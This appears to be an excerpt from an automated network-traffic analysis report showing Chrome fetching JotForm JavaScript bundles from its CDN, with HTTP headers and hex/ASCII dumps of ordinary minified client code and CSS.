                                                                                                                                                                                                                                            Data Ascii: ,hostname:m.hostname,port:m.port,pathname:"/"===m.pathname.charAt(0)?m.pathname:"/"+m.pathname}}function v(){this.message="String contains an invalid character"}(v.prototype=new Error).code=5,v.prototype.name="InvalidCharacterError";function E(p){return n
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6c 69 74 28 22 5c 6e 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 2c 74 3d 64 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 30 2c 6e 29 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 64 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 6e 2b 31 29 29 2c 74 26 26 28 72 5b 74 5d 26 26 30 3c 3d 79 2e 69 6e 64 65 78 4f 66 28 74 29 7c 7c 28 72 5b 74 5d 3d 22 73 65 74 2d 63 6f 6f 6b 69 65 22 3d 3d 3d 74 3f 28 72 5b 74 5d 7c 7c 5b 5d 29 2e 63 6f 6e 63 61 74 28 5b 6e 5d 29 3a 72 5b 74 5d 3f 72 5b 74 5d 2b 22 2c 20 22 2b 6e 3a 6e 29 29 7d 29 2c 72 29 3a 6e 75 6c 6c 2c 69 3d 7b 64 61 74 61 3a 70 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 26 26 22 74 65 78 74 22 21 3d 3d 70 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 3f 63 2e
                                                                                                                                                                                                                                            Data Ascii: lit("\n"),function(e){n=e.indexOf(":"),t=d.trim(e.substr(0,n)).toLowerCase(),n=d.trim(e.substr(n+1)),t&&(r[t]&&0<=y.indexOf(t)||(r[t]="set-cookie"===t?(r[t]||[]).concat([n]):r[t]?r[t]+", "+n:n))}),r):null,i={data:p.responseType&&"text"!==p.responseType?c.
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 22 2c 70 2e 6f 6e 55 70 6c 6f 61 64 50 72 6f 67 72 65 73 73 29 2c 70 2e 63 61 6e 63 65 6c 54 6f 6b 65 6e 26 26 70 2e 63 61 6e 63 65 6c 54 6f 6b 65 6e 2e 70 72 6f 6d 69 73 65 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 26 26 28 63 2e 61 62 6f 72 74 28 29 2c 75 28 65 29 2c 63 3d 6e 75 6c 6c 29 7d 29 2c 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 6e 75 6c 6c 29 2c 63 2e 73 65 6e 64 28 6e 29 7d 29 7d 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 3d 53 74 72 69 6e 67 28 65 29 2c 6f 3d 22 22 2c 61 3d 30 2c 69 3d 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b
                                                                                                                                                                                                                                            Data Ascii: ",p.onUploadProgress),p.cancelToken&&p.cancelToken.promise.then(function(e){c&&(c.abort(),u(e),c=null)}),void 0===n&&(n=null),c.send(n)})}var b=function(e){for(var t,n,r=String(e),o="",a=0,i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 65 2c 74 29 7b 74 21 3d 3d 72 26 26 74 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3d 3d 3d 72 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 26 26 28 6e 5b 72 5d 3d 65 2c 64 65 6c 65 74 65 20 6e 5b 74 5d 29 7d 29 2c 64 2e 69 73 46 6f 72 6d 44 61 74 61 28 65 29 7c 7c 64 2e 69 73 41 72 72 61 79 42 75 66 66 65 72 28 65 29 7c 7c 64 2e 69 73 42 75 66 66 65 72 28 65 29 7c 7c 64 2e 69 73 53 74 72 65 61 6d 28 65 29 7c 7c 64 2e 69 73 46 69 6c 65 28 65 29 7c 7c 64 2e 69 73 42 6c 6f 62 28 65 29 3f 65 3a 64 2e 69 73 41 72 72 61 79 42 75 66 66 65 72 56 69 65 77 28 65 29 3f 65 2e 62 75 66 66 65 72 3a 64 2e 69 73 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 65 29 3f 28 41 28 74 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f
                                                                                                                                                                                                                                            Data Ascii: e,t){t!==r&&t.toUpperCase()===r.toUpperCase()&&(n[r]=e,delete n[t])}),d.isFormData(e)||d.isArrayBuffer(e)||d.isBuffer(e)||d.isStream(e)||d.isFile(e)||d.isBlob(e)?e:d.isArrayBufferView(e)?e.buffer:d.isURLSearchParams(e)?(A(t,"application/x-www-form-urlenco
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 2e 74 72 61 6e 73 66 6f 72 6d 52 65 73 70 6f 6e 73 65 29 2c 65 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 75 28 65 29 7c 7c 28 4e 28 74 29 2c 65 26 26 65 2e 72 65 73 70 6f 6e 73 65 26 26 28 65 2e 72 65 73 70 6f 6e 73 65 2e 64 61 74 61 3d 73 28 65 2e 72 65 73 70 6f 6e 73 65 2e 64 61 74 61 2c 65 2e 72 65 73 70 6f 6e 73 65 2e 68 65 61 64 65 72 73 2c 74 2e 74 72 61 6e 73 66 6f 72 6d 52 65 73 70 6f 6e 73 65 29 29 29 2c 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 65 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 2c 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 64 2e 66 6f 72 45 61 63 68 28 5b 22 75 72 6c 22 2c 22 6d 65 74 68 6f 64 22 2c 22 70 61 72 61 6d 73 22 2c 22 64 61 74 61 22 5d 2c 66 75 6e 63 74 69
                                                                                                                                                                                                                                            Data Ascii: .transformResponse),e},function(e){return u(e)||(N(t),e&&e.response&&(e.response.data=s(e.response.data,e.response.headers,t.transformResponse))),Promise.reject(e)})}function B(t,n){n=n||{};var r={};return d.forEach(["url","method","params","data"],functi
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 22 68 65 61 64 22 2c 22 6f 70 74 69 6f 6e 73 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 71 2e 70 72 6f 74 6f 74 79 70 65 5b 6e 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 71 75 65 73 74 28 64 2e 6d 65 72 67 65 28 74 7c 7c 7b 7d 2c 7b 6d 65 74 68 6f 64 3a 6e 2c 75 72 6c 3a 65 7d 29 29 7d 7d 29 2c 64 2e 66 6f 72 45 61 63 68 28 5b 22 70 6f 73 74 22 2c 22 70 75 74 22 2c 22 70 61 74 63 68 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 72 29 7b 71 2e 70 72 6f 74 6f 74 79 70 65 5b 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 71 75 65 73 74 28 64 2e 6d 65 72 67 65 28 6e 7c 7c 7b 7d 2c 7b 6d 65 74 68 6f 64 3a 72 2c 75 72 6c 3a 65 2c 64 61 74 61 3a 74 7d 29 29 7d 7d 29 3b 76
                                                                                                                                                                                                                                            Data Ascii: "head","options"],function(n){q.prototype[n]=function(e,t){return this.request(d.merge(t||{},{method:n,url:e}))}}),d.forEach(["post","put","patch"],function(r){q.prototype[r]=function(e,t,n){return this.request(d.merge(n||{},{method:r,url:e,data:t}))}});v
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC131INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 6f 74 46 6f 72 6d 41 63 74 69 6f 6e 73 20 23 52 65 71 75 65 73 74 45 72 72 22 2c 65 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 6f 74 46 6f 72 6d 41 63 74 69 6f 6e 73 22 2c 65 29 7d 7d 7d 7d 7d 28 29 3b 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: (function(e){}).catch(function(e){console.log("JotFormActions #RequestErr",e)})}catch(e){console.log("JotFormActions",e)}}}}}();


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            16192.168.2.1749719172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC561OUTGET /s/portal/674ac14411e/static/js/index.f047cc75.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn02.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC430INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 3551601
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:15 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "cfbd9668b652a0b7ef999724288bf504"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 259
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b6989b7cf4-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC939INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 33 35 36 62 36 35 36 2d 64 35 62 37 2d 35 30 63 31 2d 62 63 35 33 2d 36 62 31 35 35 39 62 31 35 39 64 63 22 29 7d 63 61 74 63
                                                                                                                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e356b656-d5b7-50c1-bc53-6b1559b159dc")}catc
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 65 74 41 70 70 56 65 72 73 69 6f 6e 53 65 6c 65 63 74 6f 72 29 2c 79 3d 28 30 2c 69 2e 76 39 29 28 68 2e 5a 2e 67 65 74 4c 6f 67 6f 50 72 6f 70 65 72 74 69 65 73 29 2c 76 3d 70 2c 43 3d 21 21 75 3b 72 65 74 75 72 6e 20 67 3d 3d 3d 6d 2e 5a 5b 30 5d 3f 28 30 2c 6f 2e 6a 73 78 29 28 63 2e 5a 2c 7b 57 72 61 70 70 65 72 3a 76 2c 74 69 74 6c 65 3a 66 2c 6c 6f 67 6f 50 72 6f 70 65 72 74 69 65 73 3a 79 7d 29 3a 28 30 2c 6f 2e 6a 73 78 29 28 73 2e 5a 2c 7b 74 79 70 65 3a 43 3f 6c 2e 6e 72 2e 69 6d 61 67 65 3a 74 2c 62 67 43 6f 6c 6f 72 3a 6e 2c 62 67 55 52 4c 3a 43 3f 75 3a 64 2c 69 63 6f 6e 43 6f 6c 6f 72 3a 61 2c 73 76 67 52 65 66 3a 72 2c 61 6c 74 3a 60 24 7b 66 7d 20 49 63 6f 6e 60 2c 57 72 61 70 70 65 72 3a 76 2c 77 69 74 68 42 6f 72 64 65 72 3a 65 7d 29 7d
                                                                                                                                                                                                                                            Data Ascii: etAppVersionSelector),y=(0,i.v9)(h.Z.getLogoProperties),v=p,C=!!u;return g===m.Z[0]?(0,o.jsx)(c.Z,{Wrapper:v,title:f,logoProperties:y}):(0,o.jsx)(s.Z,{type:C?l.nr.image:t,bgColor:n,bgURL:C?u:d,iconColor:a,svgRef:r,alt:`${f} Icon`,Wrapper:v,withBorder:e})}
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 6e 28 39 34 36 35 33 29 2c 61 3d 28 6e 28 33 37 38 39 37 29 2c 6e 28 31 31 32 36 38 29 29 2c 72 3d 6e 28 36 35 39 36 34 29 2c 69 3d 6e 28 39 39 32 31 36 29 3b 63 6f 6e 73 74 20 6c 3d 28 7b 57 72 61 70 70 65 72 3a 65 2c 77 69 74 68 42 6f 72 64 65 72 3a 74 2c 74 69 74 6c 65 3a 6e 2c 6c 6f 67 6f 50 72 6f 70 65 72 74 69 65 73 3a 61 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 6c 6f 67 6f 54 79 70 65 3a 72 2c 6c 6f 67 6f 42 61 63 6b 67 72 6f 75 6e 64 3a 6c 2c 6c 6f 67 6f 55 52 4c 3a 73 2c 6c 6f 67 6f 53 76 67 52 65 66 3a 63 2c 69 63 6f 6e 43 6f 6c 6f 72 3a 64 7d 3d 61 2c 75 3d 60 24 7b 6e 7d 20 4c 6f 67 6f 60 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 6a 73 78 29 28 69 2e 5a 2c 7b 74 79 70 65 3a 72 2c 62 67 43 6f 6c
                                                                                                                                                                                                                                            Data Ascii: ){"use strict";var o=n(94653),a=(n(37897),n(11268)),r=n(65964),i=n(99216);const l=({Wrapper:e,withBorder:t,title:n,logoProperties:a})=>{const{logoType:r,logoBackground:l,logoURL:s,logoSvgRef:c,iconColor:d}=a,u=`${n} Logo`;return(0,o.jsx)(i.Z,{type:r,bgCol
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 79 47 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 31 31 37 35 39 29 3b 63 6f 6e 73 74 20 61 3d 6f 2e 5a 50 2e 64 69 76 60 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 20 74 6f 70 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 32 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 33 39 2c 20 34 31 2c 20 35 35 2c 20 30 2e 36 31 29 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 61 6c 69 67 6e
                                                                                                                                                                                                                                            Data Ascii: ction(){return a},yG:function(){return i}});var o=n(11759);const a=o.ZP.div` position: fixed; left: 0; top: 0; width: 100%; height: 100%; z-index: 1002; background-color: rgba(39, 41, 55, 0.61); display: flex; flex-direction: column; align
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 31 32 70 78 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 66 39 31 61 61 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 35 65 6d 20 30 3b 0a 20 20 7d 0a 0a 20 20 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 2d 6d 6f 64 61 6c 2d 63 6c 6f 73 65 42 74 6e 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 31 70 78 20 32 34 70 78 20 31 38 70 78 20 30 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 66 6c 65 78
                                                                                                                                                                                                                                            Data Ascii: style: normal; line-height: normal; letter-spacing: 0.12px; color: #8f91aa; margin: 0.25em 0; } .announcement-modal-closeBtn { padding: 0; height: auto; margin: 21px 24px 18px 0; display: block; border: 0; flex
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 31 31 32 36 38 29 2c 63 3d 6e 28 33 39 36 34 31 29 3b 63 6f 6e 73 74 20 64 3d 28 30 2c 6c 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 28 65 2c 74 29 3d 3e 7b 76 61 72 7b 44 69 61 6c 6f 67 52 65 6e 64 65 72 65 72 3a 6e 2c 43 6f 6e 74 65 6e 74 52 65 6e 64 65 72 65 72 3a 6c 2c 48 65 61 64 65 72 52 65 6e 64 65 72 65 72 3a 73 2c 46 6f 6f 74 65 72 52 65 6e 64 65 72 65 72 3a 64 2c 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 3a 75 7d 3d 65 2c 70 3d 28 30 2c 72 2e 5f 29 28 65 2c 5b 22 44 69 61 6c 6f 67 52 65 6e 64 65 72 65 72 22 2c 22 43 6f 6e 74 65 6e 74 52 65 6e 64 65 72 65 72 22 2c 22 48 65 61 64 65 72 52 65 6e 64 65 72 65 72 22 2c 22 46 6f 6f 74 65 72 52 65 6e 64 65 72 65 72 22 2c 22 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 22 5d 29 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73
                                                                                                                                                                                                                                            Data Ascii: 11268),c=n(39641);const d=(0,l.forwardRef)(((e,t)=>{var{DialogRenderer:n,ContentRenderer:l,HeaderRenderer:s,FooterRenderer:d,onModalClose:u}=e,p=(0,r._)(e,["DialogRenderer","ContentRenderer","HeaderRenderer","FooterRenderer","onModalClose"]);return(0,i.js
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 7b 28 7b 63 6f 6c 6f 72 3a 65 7d 29 3d 3e 63 2e 69 76 60 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 24 7b 65 7d 3b 60 7d 0a 0a 20 20 20 20 73 76 67 20 7b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 39 70 78 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 39 70 78 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 60 2c 75 3d 65 3d 3e 7b 76 61 72 7b 69 63 6f 6e 3a 74 2c 49 63 6f 6e 52 65 6e 64 65 72 65 72 3a 6e 7d 3d 65 2c 6c 3d 28 30 2c 72 2e 5f 29 28 65 2c 5b 22 69 63 6f 6e 22 2c 22 49 63 6f 6e 52 65 6e 64 65 72 65 72 22 5d 29 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 64 2c 28 30 2c 61 2e 5f 29 28 28 30 2c 6f 2e 5f 29 28 7b 7d 2c 6c 29 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65
                                                                                                                                                                                                                                            Data Ascii: {({color:e})=>c.iv`background-color: ${e};`} svg { width: 19px; height: 19px; } }`,u=e=>{var{icon:t,IconRenderer:n}=e,l=(0,r._)(e,["icon","IconRenderer"]);return(0,i.jsx)(d,(0,a._)((0,o._)({},l),{children:(0,i.jsx)("div",{className
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6d 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 7d 0a 0a 20 20 26 2e 70 61 6e 65 6c 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 63 61 70 69 74 61 6c 69 7a 65 3b 0a 20 20 20 20 62 6f 72 64
                                                                                                                                                                                                                                            Data Ascii: m; line-height: 1.5; font-weight: 500; font-family: inherit; } &.panel { display: inline-flex; align-items: center; justify-content: center; border-radius: 4px; cursor: pointer; text-transform: capitalize; bord
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 20 23 41 30 41 36 43 33 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 43 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 26 2e 74 61 73 74 65 2e 69 73 42 6c 75 65 2c 20 26 2e 70 61 6e 65 6c 2e 69 73 42 6c 75 65 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 39 39 46 46 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 2e 33 73 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 65 61 73 65 3b 0a 0a 20 20 20 20 26 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 61 64 66 66 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 26 3a 61 63 74 69 76 65 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: #A0A6C3; background-color: #FAFAFC; } } &.taste.isBlue, &.panel.isBlue { background-color: #0099FF; color: #fff; transition: .3s background-color ease; &:hover { background-color: #33adff; } &:active {
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 0a 20 20 20 20 20 20 73 76 67 20 70 61 74 68 20 7b 20 66 69 6c 6c 3a 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 0a 20 20 26 2e 74 61 73 74 65 2e 71 75 69 63 6b 51 52 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 26 20 3e 20 73 76 67 20 7b 0a 20 20 20 20 20 20 26 20 3e 20 70 61 74 68 20 7b 20 66 69 6c 6c 3a 20 23 66 66 66 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 38 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 39 70 78 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 26 2e 74 61 73 74 65 2e 71 75 69 63 6b 51 52 20 7b 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: olor: #fff; svg path { fill: #fff; } } } &.taste.quickQR { border-radius: 4px; & > svg { & > path { fill: #fff } } @media screen and (max-width: 480px) { border-radius: 29px; } } &.taste.quickQR {


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            17192.168.2.1749718104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC560OUTGET /s/portal/674ac14411e/static/js/8953.7f4b13b0.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC430INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 1618634
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:16 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "e12c5f031d037522abc840e972f9a822"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 259
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b66e55c457-EWR
